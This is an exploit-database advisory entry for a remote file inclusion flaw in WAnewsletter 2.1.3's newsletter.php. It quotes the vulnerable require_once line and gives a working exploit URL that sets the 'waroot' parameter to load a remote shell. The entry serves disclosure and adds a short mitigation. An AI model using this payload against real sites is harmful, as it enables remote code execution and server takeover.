WAnewsletter-2.1.3 (newsletter.php) RFI Vul

vendor:

WAnewsletter

by:

Mogatil

N/A

CVSS

N/A

Remote File Inclusion (RFI)

Unknown

CWE

Product Name: WAnewsletter

Affected Version From: WAnewsletter-2.1.3

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested:

2007

WAnewsletter-2.1.3 (newsletter.php) RFI Vul

The vulnerability allows an attacker to include a remote file by manipulating the 'waroot' parameter in the URL. This can lead to arbitrary code execution on the target system.

Mitigation:

The vulnerability can be mitigated by properly validating and sanitizing user input before including any files.

Source

Exploit-DB raw data:

======================= S==A==U==D==I ========================

WAnewsletter-2.1.3 (newsletter.php) RFI Vul

==============================================================

Found By : Mogatil , jjl@hotmail.com

==============================================================

Script Site : http://script.emanual.ru/get?i=1053

==============================================================
File : /newsletter.php


require_once($waroot . 'start.php');

==============================================================

Thanx: cold zero . gawey Al Azary . crazy man . scorbion_22 .
the_muslim_sniper

==============================================================

Exploit :[Path]/newsletter/newsletter.php?waroot=shell

==============================================================

# milw0rm.com [2007-05-28]